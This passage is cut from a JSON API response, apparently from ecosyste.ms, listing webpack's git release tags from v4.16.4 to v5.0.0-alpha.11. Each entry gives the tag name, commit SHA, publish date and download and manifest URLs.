Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v